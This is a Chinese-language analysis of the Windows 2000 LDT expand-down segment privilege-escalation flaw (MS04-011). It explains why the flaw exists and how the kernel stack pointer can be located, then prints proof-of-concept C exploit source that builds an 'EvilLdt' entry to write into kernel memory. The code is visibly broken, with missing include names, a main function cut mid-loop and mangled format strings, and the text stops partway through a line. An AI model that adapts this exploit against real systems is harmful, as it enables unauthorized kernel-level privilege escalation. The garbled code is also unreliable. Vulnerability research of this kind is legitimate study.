Windows 2000 LDT漏洞初探

·最新Windows Live邮箱注册及漏洞分析·提高警惕：WINDOWS最危险的十个漏洞·安全警报：针对Access漏洞又一发现·MacOS X存在严重漏洞 苹果补救不力挨批·漏洞分析：SQL Injection技巧的演练·Windows XP的漏洞及防范篇（2）·支付宝所有版本控件均存严重漏洞·封杀Win XP系统共享漏洞·封杀Windows XP的共享漏洞·通过IE调用Telnet执行攻击者代码漏洞 　　1.漏洞原因　　z0mbie文章里提到在Win2k下进程可以自己添加LDT项,这可能是由于历史原因才留在系统代码中,因为Win2k本身并不会用到LDT.这个漏洞的核心是LDT项中Expand-Down位的设置.例子,一个LDT的Base为100,Limit为7FFFFFFF.当Expand-Down位为0时.LDT的有效范围是: 100 ~ 7FFFFFFF.　　但当Expand-Down位为1时,有效范围是: 80000000 ~ FFFFFFFF 和 0 ~ FF,及刚好相反.在Win2k添加LDT项的检测过程没有考虑这一情况,导致用户可以建立包含内核空间在内的LDT项(这其实只是一方面,GDT[23]本来就是0-FFFFFFFF,关键是我们可以控制LDT的基址,而内核有时假设基址为0,这样能使其在处理内存时发生计算误差).　　　　2.利用原理　　因为Win2k是基于页的内存保护机制,而我们又运行在ring3态下这一事实,所以需要借助内核本身来进行越权操作.eEye的文中提到int 2e中的rep movsd指令.int 2e的使用方法:　　　　mov eax, service_id　　lea edx, service_param　　int 2e　　　　当运行rep movsd指令时:　　　　edi为内核堆栈指针(KSP, 我机子上一般是FDxxxxxx)　　esi指向service_param　　ecx为参数的个数(in 32bit)　　　　相当于memcpy (es.base edi, ds.base esi, ecx*4);　　　　这里service_param的内容,es寄存器都是可控的.唯一不确定的是edi及内核堆栈指针.获得KSP一种方法是,先假设一个大约值,比如FD000000,再分配一较大内存空间(16MB)buf,利用这个漏洞将一特征码写入buf,最后找出特征码在buf中的偏移量offset,计算出:　　　　KSP精确值 = 假设值(FD000000) offset.　　　　至于提升权限的部分,还没找到比较通用的方法.eEye说加LDT,但LDT的地址在KSP下方,没理解.IDT, GDT也在KSP下方.我能想到就是改Driver Dispatch Routies,通过I/O API调用.因为不是很通用这里就不列了.如果有什么好的方法,请告诉我.谢谢.　　　　3.具体步骤　　　　见代码.另外Win2k的代码也有了,可以和eEye的公告对照着看.　　　　　　/***********************************************************　　* 计算出Kernel Stack Pointer后,就能精确控制写入的地址了.　　* 要注意的是只能覆写到KSP以上的内核空间.　　***********************************************************/　　　　/******************************************************************　　* Windows Expand-Down Data Segment Local Privilege Escalation　　* [MS04-011]　　*　　* Bug found by: Derek Soeder　　* Author:　mslug ([email protected]), All rights reserved.　　* 　　* Version: PoC 0.1　　*　　* Tested:　Win2k pro en sp4　　*　　* Thanks:　z0mbie's article :)　　* 　　* Compile: cl winldt.c 　　*　　* Date:　　18 Apr 2004　　*******************************************************************/　　　　　　#include 　　#include 　　#include 　　　　#if 1　　　 #define KernelStackPtr　0xFD000000　//估计值　　　 #define BedSize　　　　 0x01000000　　#else　　　 #define KernelStackPtr　0xF0000000　　　 #define BedSize　　　　 0x10000000　　#endif　　　　unsigned char bed[BedSize];　　unsigned char pin[]="COOL";　　　　int (*NtSetLdtEntries)(DWORD, DWORD, DWORD, DWORD, DWORD, DWORD);　　　　WORD SetupLDT(WORD seg, DWORD ldtbase);　　　　unsigned long patch_to;　　　　int main(int argc, char *argv[])　　{　　　 DWORD ldtbase, KSP;　　　 int i;　　　 HMODULE hNtdll;　　　 　　　 if(argc 　　　　　　 //printf("[!] Knl stack ptr : 0xX\n", KSP);　　　　　　 break;　　　　　}　　　 }　　　 　　　 if(!KSP) {　　　　　printf("[-] Can't locate Kernel stack pointer, try again\n");　　　　　return 0;　　　 } else if (patch_to < KSP) {　　　　　printf("[-] Can only patch kernel above KSP\n");　　　　　return 0;　　　 }　　　 　　　 ldtbase = patch_to - KSP;　　　　　 printf("[ ] Patch to　　　: 0xX\n", patch_to);　　　 printf("[ ] 2nd LDT base　: 0xX\n", ldtbase);　　　　　 SetupLDT(0x17, ldtbase);　　　 __asm {　　　　　push es　　　　　push 17h　　　　　pop es　　　　　mov eax, 11h　　　　　lea edx, pin　　　　　int 2eh　　 　　　　　pop es　　　 }　　　 　　　 return 0;　　}　　　　WORD SetupLDT(WORD seg, DWORD ldtbase)　　{　　　 LDT_ENTRY EvilLdt;　　　 DWORD base　= ldtbase;　　　 DWORD limit = 0;　　　 int ret;　　　 　　　 EvilLdt.BaseLow　　　　　　　　　 = base & 0xFFFF;　　　 EvilLdt.HighWord.Bytes.BaseMid　　= base >> 16;　　　 EvilLdt.HighWord.Bytes.BaseHi　　 = base >> 24;　　　 EvilLdt.LimitLow　　　　　　　　　= (limit >> 12) & 0xFFFF;　　　 EvilLdt.HighWord.Bits.LimitHi　　 = limit >> 28;　　　 EvilLdt.HighWord.Bits.Granularity = 1;　　// 0/1, if 1, limit=(limit